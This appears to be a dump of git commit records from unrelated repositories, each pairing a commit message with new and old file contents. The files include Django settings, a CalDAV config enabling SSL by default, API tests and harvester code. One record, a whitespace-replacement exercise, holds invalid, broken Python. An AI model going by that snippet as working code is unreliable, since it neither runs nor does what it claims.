"test_accounts",
"test_vendors",
"organizations",
"test_custom",
],
MIDDLEWARE_CLASSES=[],
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
ORGS_SLUGFIELD='autoslug.AutoSlugField',
ROOT_URLCONF="tests.urls",
)
django.setup()
| bsd-2-clause | Python |
8d6287397b47fcaf98cadc59349f1db68c7b2d93 | Update 1.4_replace_whitespace.py | HeyIamJames/CodingInterviewPractice,HeyIamJames/CodingInterviewPractice | CrackingCodingInterview/1.4_replace_whitespace.py | CrackingCodingInterview/1.4_replace_whitespace.py | """
Replace all whitespace in a string with '%20'
"""
def replace(string):
for i in string:
string.replace("", %20)
return string
| """
Replace all whitespace in a string with '%20'
"""
| mit | Python |
8a1b902b729597f5c8536b235d7add887f097fdd | Drop box should be off by default. SSL should be on by default, HTTP should be off. | trevor/calendarserver,trevor/calendarserver,trevor/calendarserver | twistedcaldav/config.py | twistedcaldav/config.py | ##
# Copyright (c) 2005-2006 Apple Computer, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DRI: David Reid, [email protected]
##
import os
from twistedcaldav.py.plistlib import readPlist
defaultConfigFile = '/etc/caldavd/caldavd.plist'
defaultConfig = {
'CreateAccounts': False,
'DirectoryService': {
'params': {'node': '/Search'},
'type': 'twistedcaldav.directory.appleopendirectory.OpenDirectoryService'
},
'DocumentRoot': '/Library/CalendarServer/Documents',
'DropBoxEnabled': False,
'ErrorLogFile': '/var/log/caldavd/error.log',
'ManholePort': 0,
'MaximumAttachmentSizeBytes': 1048576,
'NotificationsEnabled': False,
'PIDFile': '/var/run/caldavd.pid',
'Port': 8008,
'ResetAccountACLs': False,
'RunStandalone': True,
'SSLCertificate': '/etc/certificates/Default.crt',
'SSLEnable': True,
'SSLOnly': True,
'SSLPort': 8443,
'SSLPrivateKey': '/etc/certificates/Default.key',
'ServerLogFile': '/var/log/caldavd/server.log',
'ServerStatsFile': '/Library/CalendarServer/Documents/stats.plist',
'UserQuotaBytes': 104857600,
'Verbose': False,
'twistdLocation': '/usr/share/caldavd/bin/twistd',
'SACLEnable': False,
'AuthSchemes': ['Basic'],
'AdminPrincipals': ['/principal/users/admin']
}
class Config (object):
def __init__(self, defaults):
self.update(defaults)
def update(self, items):
items = items.iteritems()
for key, value in items:
setattr(self, key, value)
config = Config(defaultConfig)
def parseConfig(configFile):
if os.path.exists(configFile):
plist = readPlist(configFile)
config.update(plist)
| ##
# Copyright (c) 2005-2006 Apple Computer, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DRI: David Reid, [email protected]
##
import os
from twistedcaldav.py.plistlib import readPlist
defaultConfigFile = '/etc/caldavd/caldavd.plist'
defaultConfig = {
'CreateAccounts': False,
'DirectoryService': {
'params': {'node': '/Search'},
'type': 'twistedcaldav.directory.appleopendirectory.OpenDirectoryService'
},
'DocumentRoot': '/Library/CalendarServer/Documents',
'DropBoxEnabled': True,
'ErrorLogFile': '/var/log/caldavd/error.log',
'ManholePort': 0,
'MaximumAttachmentSizeBytes': 1048576,
'NotificationsEnabled': False,
'PIDFile': '/var/run/caldavd.pid',
'Port': 8008,
'ResetAccountACLs': False,
'RunStandalone': True,
'SSLCertificate': '/etc/certificates/Default.crt',
'SSLEnable': False,
'SSLOnly': False,
'SSLPort': 8443,
'SSLPrivateKey': '/etc/certificates/Default.key',
'ServerLogFile': '/var/log/caldavd/server.log',
'ServerStatsFile': '/Library/CalendarServer/Documents/stats.plist',
'UserQuotaBytes': 104857600,
'Verbose': False,
'twistdLocation': '/usr/share/caldavd/bin/twistd',
'SACLEnable': False,
'AuthSchemes': ['Basic'],
'AdminPrincipals': ['/principal/users/admin']
}
class Config (object):
def __init__(self, defaults):
self.update(defaults)
def update(self, items):
items = items.iteritems()
for key, value in items:
setattr(self, key, value)
config = Config(defaultConfig)
def parseConfig(configFile):
if os.path.exists(configFile):
plist = readPlist(configFile)
config.update(plist)
| apache-2.0 | Python |
3e8d6e31f576fb857a1415c85a227f56225b8f06 | fix database path | SerhoLiu/serholiu.com,SerhoLiu/serholiu.com | blogconfig.py | blogconfig.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 博客名和简介
blogname = "I'm SErHo"
blogdesc = "SErHo's Blog, Please Call me Serho Liu."
blogcover = "//dn-serho.qbox.me/blogbg.jpg"
# Picky 目录和数据库
picky = "/home/serho/website/picky"
database = "/home/serho/website/newblog.db"
# 其他设置
# disqus = "serho"
# secret = "use random"
debug = False
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 博客名和简介
blogname = "I'm SErHo"
blogdesc = "SErHo's Blog, Please Call me Serho Liu."
blogcover = "//dn-serho.qbox.me/blogbg.jpg"
# Picky 目录和数据库
picky = "/home/serho/website/picky"
database = "//home/serho/website/newblog.db"
# 其他设置
# disqus = "serho"
# secret = "use random"
debug = False
| mit | Python |
1630bb891bf57052984301b9dd191826ca7ba18e | Update test_biobambam.py | Multiscale-Genomics/mg-process-fastq,Multiscale-Genomics/mg-process-fastq,Multiscale-Genomics/mg-process-fastq | tests/test_biobambam.py | tests/test_biobambam.py | """
.. Copyright 2017 EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import time
import pytest # pylint: disable=unused-import
from tool import biobambam_filter
def test_biobambam():
"""
Test case to ensure that BioBamBam works
"""
bbb = biobambam_filter.biobambam()
resource_path = os.path.join(os.path.dirname(__file__), "data/")
bbb.run(
[resource_path + "macs2.Human.DRR000150.22.bam"],
[]
)
print "Start : %s" % time.ctime()
time.sleep (10)
print "End : %s" % time.ctime()
assert os.path.isfile(resource_path + "macs2.Human.DRR000150.22.filtered.bam") is True
testFile = open(resource_path + "macs2.Human.DRR000150.22.filtered.bam")
print ("read line: ")
print (testFile.readline())
assert os.path.getsize(resource_path + "macs2.Human.DRR000150.22.filtered.bam") > 0
| """
.. Copyright 2017 EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os.path
import time
import pytest # pylint: disable=unused-import
from tool import biobambam_filter
def test_biobambam():
"""
Test case to ensure that BioBamBam works
"""
bbb = biobambam_filter.biobambam()
resource_path = os.path.join(os.path.dirname(__file__), "data/")
bbb.run(
[resource_path + "macs2.Human.DRR000150.22.bam"],
[]
)
print "Start : %s" % time.ctime()
time.sleep (10)
print "End : %s" % time.ctime()
assert os.path.isfile(resource_path + "macs2.Human.DRR000150.22.filtered.bam") is True
assert os.path.getsize(resource_path + "macs2.Human.DRR000150.22.filtered.bam") > 0
| apache-2.0 | Python |
8fa0dca5cd5187126a10197883348fc6b16544b5 | Test get campaigns by email | jakesen/pyhatchbuck | tests/test_campaigns.py | tests/test_campaigns.py | import os
import vcr
import unittest
from hatchbuck.api import HatchbuckAPI
from hatchbuck.objects import Contact
class TestCampaigns(unittest.TestCase):
def setUp(self):
# Fake key can be used with existing cassettes
self.test_api_key = os.environ.get("HATCHBUCK_API_KEY", "ABC123")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_id = "d1F4Tm1tcUxVRmdFQmVIT3lhVjNpaUtxamprakk5S3JIUGRmVWtHUXJaRTE1"
contact = hatchbuck.search_contacts(contactId=contact_id)[0]
self.assertEqual(contact.contactId, contact_id)
campaigns = contact.get_campaigns()
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].step, 0)
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns_by_email.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns_by_email(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_email = "[email protected]"
campaigns = hatchbuck.get_campaigns(contact_email)
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].step, 0)
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
if __name__ == '__main__':
unittest.main()
| import os
import vcr
import unittest
from hatchbuck.api import HatchbuckAPI
from hatchbuck.objects import Contact
class TestCampaigns(unittest.TestCase):
def setUp(self):
# Fake key can be used with existing cassettes
self.test_api_key = os.environ.get("HATCHBUCK_API_KEY", "ABC123")
@vcr.use_cassette(
'tests/fixtures/cassettes/test_get_contact_campaigns.yml',
filter_query_parameters=['api_key']
)
def test_get_contact_campaigns(self):
hatchbuck = HatchbuckAPI(self.test_api_key)
contact_id = "d1F4Tm1tcUxVRmdFQmVIT3lhVjNpaUtxamprakk5S3JIUGRmVWtHUXJaRTE1"
contact = hatchbuck.search_contacts(contactId=contact_id)[0]
self.assertEqual(contact.contactId, contact_id)
campaigns = contact.get_campaigns()
self.assertEqual(campaigns[0].name, "Brochure Request Followup")
self.assertEqual(campaigns[0].id, "b1BFUnM1Unh0MDVVOVJEWUc1d0pTM0pUSVY4QS0xOW5GRHRsS05DXzNXazE1")
if __name__ == '__main__':
unittest.main()
| mit | Python |
d8a83ea3433948447c307a894b16c2b8a12247e8 | Kill defaulting to json for now. | safwanrahman/readthedocs.org,laplaceliu/readthedocs.org,cgourlay/readthedocs.org,techtonik/readthedocs.org,singingwolfboy/readthedocs.org,SteveViss/readthedocs.org,asampat3090/readthedocs.org,VishvajitP/readthedocs.org,dirn/readthedocs.org,singingwolfboy/readthedocs.org,sid-kap/readthedocs.org,techtonik/readthedocs.org,raven47git/readthedocs.org,sunnyzwh/readthedocs.org,SteveViss/readthedocs.org,kenshinthebattosai/readthedocs.org,GovReady/readthedocs.org,rtfd/readthedocs.org,Carreau/readthedocs.org,atsuyim/readthedocs.org,agjohnson/readthedocs.org,tddv/readthedocs.org,dirn/readthedocs.org,dirn/readthedocs.org,michaelmcandrew/readthedocs.org,hach-que/readthedocs.org,takluyver/readthedocs.org,d0ugal/readthedocs.org,davidfischer/readthedocs.org,espdev/readthedocs.org,sunnyzwh/readthedocs.org,d0ugal/readthedocs.org,sunnyzwh/readthedocs.org,jerel/readthedocs.org,ojii/readthedocs.org,clarkperkins/readthedocs.org,michaelmcandrew/readthedocs.org,gjtorikian/readthedocs.org,mhils/readthedocs.org,agjohnson/readthedocs.org,fujita-shintaro/readthedocs.org,royalwang/readthedocs.org,alex/readthedocs.org,wijerasa/readthedocs.org,KamranMackey/readthedocs.org,stevepiercy/readthedocs.org,davidfischer/readthedocs.org,cgourlay/readthedocs.org,soulshake/readthedocs.org,Tazer/readthedocs.org,johncosta/private-readthedocs.org,royalwang/readthedocs.org,kenshinthebattosai/readthedocs.org,raven47git/readthedocs.org,safwanrahman/readthedocs.org,clarkperkins/readthedocs.org,titiushko/readthedocs.org,nyergler/pythonslides,Carreau/readthedocs.org,dirn/readthedocs.org,kenwang76/readthedocs.org,stevepiercy/readthedocs.org,KamranMackey/readthedocs.org,rtfd/readthedocs.org,raven47git/readthedocs.org,emawind84/readthedocs.org,wijerasa/readthedocs.org,sid-kap/readthedocs.org,SteveViss/readthedocs.org,stevepiercy/readthedocs.org,nikolas/readthedocs.org,sunnyzwh/readthedocs.org,LukasBoersma/readthedocs.org,kenwang76/readthedocs.org,takluyver/readthedocs.org,hach-que/readthedocs.org,GovReady/readthedocs.org,michaelmcandrew/readthedocs.org,attakei/readthedocs-oauth,techtonik/readthedocs.org,sid-kap/readthedocs.org,wanghaven/readthedocs.org,alex/readthedocs.org,asampat3090/readthedocs.org,safwanrahman/readthedocs.org,ojii/readthedocs.org,sils1297/readthedocs.org,michaelmcandrew/readthedocs.org,johncosta/private-readthedocs.org,kenshinthebattosai/readthedocs.org,atsuyim/readthedocs.org,wijerasa/readthedocs.org,alex/readthedocs.org,sils1297/readthedocs.org,clarkperkins/readthedocs.org,istresearch/readthedocs.org,jerel/readthedocs.org,espdev/readthedocs.org,wanghaven/readthedocs.org,Carreau/readthedocs.org,alex/readthedocs.org,fujita-shintaro/readthedocs.org,nikolas/readthedocs.org,kdkeyser/readthedocs.org,d0ugal/readthedocs.org,sils1297/readthedocs.org,nikolas/readthedocs.org,GovReady/readthedocs.org,d0ugal/readthedocs.org,asampat3090/readthedocs.org,stevepiercy/readthedocs.org,mrshoki/readthedocs.org,emawind84/readthedocs.org,wijerasa/readthedocs.org,gjtorikian/readthedocs.org,istresearch/readthedocs.org,royalwang/readthedocs.org,sid-kap/readthedocs.org,kdkeyser/readthedocs.org,KamranMackey/readthedocs.org,nyergler/pythonslides,mrshoki/readthedocs.org,davidfischer/readthedocs.org,hach-que/readthedocs.org,Carreau/readthedocs.org,safwanrahman/readthedocs.org,soulshake/readthedocs.org,rtfd/readthedocs.org,jerel/readthedocs.org,LukasBoersma/readthedocs.org,tddv/readthedocs.org,agjohnson/readthedocs.org,titiushko/readthedocs.org,kdkeyser/readthedocs.org,titiushko/readthedocs.org,SteveViss/readthedocs.org,LukasBoersma/readthedocs.org,rtfd/readthedocs.org,gjtorikian/readthedocs.org,tddv/readthedocs.org,CedarLogic/readthedocs.org,agjohnson/readthedocs.org,kenwang76/readthedocs.org,Tazer/readthedocs.org,attakei/readthedocs-oauth,espdev/readthedocs.org,nyergler/pythonslides,GovReady/readthedocs.org,laplaceliu/readthedocs.org,raven47git/readthedocs.org,takluyver/readthedocs.org,kenwang76/readthedocs.org,espdev/readthedocs.org,soulshake/readthedocs.org,mrshoki/readthedocs.org,singingwolfboy/readthedocs.org,kdkeyser/readthedocs.org,pombredanne/readthedocs.org,ojii/readthedocs.org,cgourlay/readthedocs.org,singingwolfboy/readthedocs.org,fujita-shintaro/readthedocs.org,mhils/readthedocs.org,CedarLogic/readthedocs.org,fujita-shintaro/readthedocs.org,jerel/readthedocs.org,mrshoki/readthedocs.org,attakei/readthedocs-oauth,istresearch/readthedocs.org,emawind84/readthedocs.org,mhils/readthedocs.org,takluyver/readthedocs.org,pombredanne/readthedocs.org,attakei/readthedocs-oauth,CedarLogic/readthedocs.org,Tazer/readthedocs.org,kenshinthebattosai/readthedocs.org,VishvajitP/readthedocs.org,hach-que/readthedocs.org,sils1297/readthedocs.org,clarkperkins/readthedocs.org,pombredanne/readthedocs.org,ojii/readthedocs.org,wanghaven/readthedocs.org,VishvajitP/readthedocs.org,Tazer/readthedocs.org,emawind84/readthedocs.org,CedarLogic/readthedocs.org,LukasBoersma/readthedocs.org,espdev/readthedocs.org,gjtorikian/readthedocs.org,nyergler/pythonslides,KamranMackey/readthedocs.org,johncosta/private-readthedocs.org,cgourlay/readthedocs.org,mhils/readthedocs.org,techtonik/readthedocs.org,atsuyim/readthedocs.org,soulshake/readthedocs.org,wanghaven/readthedocs.org,istresearch/readthedocs.org,davidfischer/readthedocs.org,titiushko/readthedocs.org,VishvajitP/readthedocs.org,laplaceliu/readthedocs.org,nikolas/readthedocs.org,laplaceliu/readthedocs.org,atsuyim/readthedocs.org,asampat3090/readthedocs.org,royalwang/readthedocs.org | api/base.py | api/base.py | from django.contrib.auth.models import User
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from tastypie.bundle import Bundle
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.authentication import BasicAuthentication
from tastypie.authorization import DjangoAuthorization, Authorization
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from builds.models import Build
from projects.models import Project
class EnhancedModelResource(ModelResource):
def obj_get_list(self, request=None, **kwargs):
"""
A ORM-specific implementation of ``obj_get_list``.
Takes an optional ``request`` object, whose ``GET`` dictionary can be
used to narrow the query.
"""
filters = None
if hasattr(request, 'GET'):
filters = request.GET
applicable_filters = self.build_filters(filters=filters)
applicable_filters.update(kwargs)
try:
return self.get_object_list(request).filter(**applicable_filters)
except ValueError, e:
raise NotFound("Invalid resource lookup data provided (mismatched type).")
class UserResource(ModelResource):
class Meta:
allowed_methods = ['get']
queryset = User.objects.all()
fields = ['username', 'first_name', 'last_name', 'last_login', 'id']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<username>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class ProjectResource(ModelResource):
user = fields.ForeignKey(UserResource, 'user')
class Meta:
include_absolute_url = True
allowed_methods = ['get']
queryset = Project.objects.all()
excludes = ['build_pdf', 'path', 'skip', 'featured']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class BuildResource(EnhancedModelResource):
project = fields.ForeignKey(ProjectResource, 'project')
class Meta:
allowed_methods = ['get']
queryset = Build.objects.all()
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<project__slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_list'), name="api_list_detail"),
]
| from django.contrib.auth.models import User
from django.conf.urls.defaults import url
from django.core.urlresolvers import reverse
from tastypie.bundle import Bundle
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.authentication import BasicAuthentication
from tastypie.authorization import DjangoAuthorization, Authorization
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from builds.models import Build
from projects.models import Project
class BaseResource(ModelResource):
def determine_format(self, *args, **kwargs):
return "application/json"
class EnhancedModelResource(BaseResource):
def obj_get_list(self, request=None, **kwargs):
"""
A ORM-specific implementation of ``obj_get_list``.
Takes an optional ``request`` object, whose ``GET`` dictionary can be
used to narrow the query.
"""
filters = None
if hasattr(request, 'GET'):
filters = request.GET
applicable_filters = self.build_filters(filters=filters)
applicable_filters.update(kwargs)
try:
return self.get_object_list(request).filter(**applicable_filters)
except ValueError, e:
raise NotFound("Invalid resource lookup data provided (mismatched type).")
class UserResource(BaseResource):
class Meta:
allowed_methods = ['get']
queryset = User.objects.all()
fields = ['username', 'first_name', 'last_name', 'last_login', 'id']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<username>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class ProjectResource(BaseResource):
user = fields.ForeignKey(UserResource, 'user')
class Meta:
include_absolute_url = True
allowed_methods = ['get']
queryset = Project.objects.all()
excludes = ['build_pdf', 'path', 'skip', 'featured']
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name="api_dispatch_detail"),
]
class BuildResource(EnhancedModelResource):
project = fields.ForeignKey(ProjectResource, 'project')
class Meta:
allowed_methods = ['get']
queryset = Build.objects.all()
def override_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<project__slug>[a-z-]+)/$" % self._meta.resource_name, self.wrap_view('dispatch_list'), name="api_list_detail"),
]
| mit | Python |
69f46596f189786fce0e2a087e6870e5d3059331 | Fix figshare harvester date range (#764) | aaxelb/SHARE,CenterForOpenScience/SHARE,aaxelb/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,aaxelb/SHARE | share/harvesters/com_figshare_v2.py | share/harvesters/com_figshare_v2.py | import pendulum
from furl import furl
from share.harvest import BaseHarvester
class FigshareHarvester(BaseHarvester):
VERSION = 1
page_size = 50
def _do_fetch(self, start_date, end_date):
url = furl(self.config.base_url).set(query_params={
'order_direction': 'asc',
'order': 'modified_date',
'page_size': self.page_size,
'modified_since': start_date.date().isoformat(),
})
return self.fetch_records(url, end_date.date())
def fetch_records(self, url, end_day):
page = 1
last_seen_day = None
while True:
page += 1
url.args['page'] = page
resp = self.requests.get(url.url)
if last_seen_day and resp.status_code == 422:
# We've asked for too much. Time to readjust date range
url.args['modified_since'] = last_seen_day.isoformat()
page = 0
continue
for item in resp.json():
resp = self.requests.get(item['url'])
detail = resp.json()
last_seen_day = pendulum.parse(detail['modified_date']).date()
if last_seen_day > end_day:
return
yield item['url'], detail
if len(resp.json()) < self.page_size:
return # We've hit the end of our results
| import pendulum
from furl import furl
from share.harvest import BaseHarvester
class FigshareHarvester(BaseHarvester):
VERSION = 1
page_size = 50
def do_harvest(self, start_date, end_date):
return self.fetch_records(furl(self.config.base_url).set(query_params={
'order_direction': 'asc',
'order': 'modified_date',
'page_size': self.page_size,
'modified_date': start_date.date().isoformat(),
}).url, end_date.date())
def fetch_records(self, url, end_day):
page, detail = 0, None
while True:
page += 1
resp = self.requests.get(furl(url).add(query_params={
'page': page,
}).url)
if resp.status_code == 422:
# We've asked for too much. Time to readjust date range
# Thanks for leaking variables python
page, url = 0, furl(url).add(query_params={
'modified_date': pendulum.parse(detail['modified_date']).date().isoformat()
})
continue
for item in resp.json():
resp = self.requests.get(item['url'])
detail = resp.json()
if pendulum.parse(detail['modified_date']).date() > end_day:
return
yield item['url'], detail
if len(resp.json()) < self.page_size:
return # We've hit the end of our results
| apache-2.0 | Python |
83f54f57170115cda98e7d1aa68972c60b865647 | Fix test_upgrades_to_html.py test | Connexions/cnx-upgrade | cnxupgrade/tests/test_upgrades_to_html.py | cnxupgrade/tests/test_upgrades_to_html.py | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""Tests for to_html command-line interface.
"""
import sys
import unittest
from . import DB_CONNECTION_STRING
class ToHtmlTestCase(unittest.TestCase):
def call_target(self, **kwargs):
from ..upgrades import to_html
return to_html.cli_command(**kwargs)
def test(self):
# Mock produce_html_for_modules
if 'cnxarchive.to_html' in sys.modules:
del sys.modules['cnxarchive.to_html']
import cnxarchive.to_html as to_html
original_func = to_html.produce_html_for_modules
self.addCleanup(setattr, to_html, 'produce_html_for_modules',
original_func)
self.call_count = 0
def f(*args, **kwargs):
self.call_count += 1
self.args = args
self.kwargs = kwargs
return []
to_html.produce_html_for_modules = f
self.call_target(db_conn_str=DB_CONNECTION_STRING,
id_select_query='SELECT 2',
overwrite_html=False)
# Assert produce_html_for_modules is called
self.assertEqual(self.call_count, 1)
self.assertEqual(str(type(self.args[0])),
"<type 'psycopg2._psycopg.connection'>")
self.assertEqual(self.args[1], 'SELECT 2')
self.assertEqual(self.kwargs, {'overwrite_html': False})
| # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""Tests for to_html command-line interface.
"""
import sys
import unittest
from . import DB_CONNECTION_STRING
class ToHtmlTestCase(unittest.TestCase):
def call_target(self, **kwargs):
from ..upgrades import to_html
return to_html.cli_command(**kwargs)
def test(self):
# Mock produce_html_for_modules
if 'cnxarchive.to_html' in sys.modules:
del sys.modules['cnxarchive.to_html']
import cnxarchive.to_html as to_html
original_func = to_html.produce_html_for_modules
self.addCleanup(setattr, to_html, 'produce_html_for_modules',
original_func)
self.call_count = 0
def f(*args, **kwargs):
self.call_count += 1
self.args = args
self.kwargs = kwargs
return []
to_html.produce_html_for_modules = f
self.call_target(db_conn_str=DB_CONNECTION_STRING,
id_select_query='SELECT 2',
overwrite_html=False)
# Assert produce_html_for_modules is called
self.assertEqual(self.call_count, 1)
self.assertEqual(str(type(self.args[0])),
"<type 'psycopg2._psycopg.connection'>")
self.assertEqual(self.args[1], 'SELECT 2')
self.assertEqual(self.args[2], False)
self.assertEqual(self.kwargs, {})
| agpl-3.0 | Python |
e20f0d3ada72cb21185ca0c3c1d22a77ee254de0 | fix rogue tab | lileiting/goatools,tanghaibao/goatools,tanghaibao/goatools,lileiting/goatools | tests/test_get_paths.py | tests/test_get_paths.py | import sys
import os
from goatools.obo_parser import GODag
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/data/"
def print_paths(paths, PRT=sys.stdout):
for path in paths:
PRT.write('\n')
for GO in path:
PRT.write('{}\n'.format(GO))
def chk_results(actual_paths, expected_paths):
for actual_path in actual_paths:
# GOTerm -> list of Strings
actual = [GO.id for GO in actual_path]
if actual not in expected_paths:
raise Exception('ACTUAL {} NOT FOUND IN EXPECTED RESULTS\n'.format(actual))
def test_paths_to_top():
dag = GODag(ROOT + "mini_obo.obo")
expected_paths = [['GO:0000001', 'GO:0000002', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000006', 'GO:0000008', 'GO:0000010']]
actual_paths = dag.paths_to_top("GO:0000010")
chk_results(actual_paths, expected_paths)
print_paths(actual_paths)
| import sys
import os
from goatools.obo_parser import GODag
ROOT = os.path.dirname(os.path.abspath(__file__)) + "/data/"
def print_paths(paths, PRT=sys.stdout):
for path in paths:
PRT.write('\n')
for GO in path:
PRT.write('{}\n'.format(GO))
def chk_results(actual_paths, expected_paths):
for actual_path in actual_paths:
# GOTerm -> list of Strings
actual = [GO.id for GO in actual_path]
if actual not in expected_paths:
raise Exception('ACTUAL {} NOT FOUND IN EXPECTED RESULTS\n'.format(actual))
def test_paths_to_top():
dag = GODag(ROOT + "mini_obo.obo")
expected_paths = [['GO:0000001', 'GO:0000002', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000005', 'GO:0000010'],
['GO:0000001', 'GO:0000003', 'GO:0000006', 'GO:0000008', 'GO:0000010']]
actual_paths = dag.paths_to_top("GO:0000010")
chk_results(actual_paths, expected_paths)
print_paths(actual_paths)
| bsd-2-clause | Python |
e42690a6f225952ddb6417edc90e27892c18d2a2 | Move api to root. | EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger,EmilStenstrom/json-tagger | api/main.py | api/main.py | from bottle import route, request, response, run, view
from collections import OrderedDict
from parser import parse_response
from server import query_server
import bottle
import json
import os
@route('/')
@view('api/views/index')
def index():
site = "%s://%s" % (request.urlparts.scheme, request.urlparts.netloc)
return {"site": site}
@route('/tag', method=["get", "post"])
def tag():
# Support posting data both via forms and via POST body
data = request.POST.get("data", request.body.getvalue())
if not data:
return {"error": "No data posted"}
raw_text = query_server(data)
sentences, entities = parse_response(raw_text)
response.content_type = "application/json"
pretty = request.POST.get("pretty", False)
json_kwargs = {"separators": (',', ':')}
if pretty:
json_kwargs = {"indent": 4, "separators": (', ', ': ')}
return json.dumps(OrderedDict([
("sentences", sentences),
("entities", entities),
]), **json_kwargs)
if __name__ == "__main__":
environment = os.environ.get("ENVIRONMENT", None)
assert environment, "Needs $ENVIRONMENT variable set"
if environment == "development":
print "RUNNING IN DEVELOPMENT MODE"
bottle.debug(True)
bottle.TEMPLATES.clear()
run(host='localhost', port=8000, reloader=True)
elif environment == "production":
print "RUNNING IN PRODUCTION MODE"
run(host="0.0.0.0", port=int(os.environ.get("PORT", 5000)))
else:
assert False, "That's not a valid $ENVIRONMENT"
| from bottle import route, request, response, run, view
from collections import OrderedDict
from parser import parse_response
from server import query_server
import bottle
import json
import os
@route('/api/')
@view('api/views/index')
def index():
site = "%s://%s" % (request.urlparts.scheme, request.urlparts.netloc)
return {"site": site}
@route('/api/tag', method=["get", "post"])
def tag():
# Support posting data both via forms and via POST body
data = request.POST.get("data", request.body.getvalue())
if not data:
return {"error": "No data posted"}
raw_text = query_server(data)
sentences, entities = parse_response(raw_text)
response.content_type = "application/json"
pretty = request.POST.get("pretty", False)
json_kwargs = {"separators": (',', ':')}
if pretty:
json_kwargs = {"indent": 4, "separators": (', ', ': ')}
return json.dumps(OrderedDict([
("sentences", sentences),
("entities", entities),
]), **json_kwargs)
if __name__ == "__main__":
environment = os.environ.get("ENVIRONMENT", None)
assert environment, "Needs $ENVIRONMENT variable set"
if environment == "development":
print "RUNNING IN DEVELOPMENT MODE"
bottle.debug(True)
bottle.TEMPLATES.clear()
run(host='localhost', port=8000, reloader=True)
elif environment == "production":
print "RUNNING IN PRODUCTION MODE"
run(host="0.0.0.0", port=int(os.environ.get("PORT", 5000)))
else:
assert False, "That's not a valid $ENVIRONMENT"
| mit | Python |
ee3b712611ed531843134ef4ce94cb45c726c127 | Fix filename creation in csv export action | limbera/django-nap,MarkusH/django-nap | nap/extras/actions.py | nap/extras/actions.py |
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
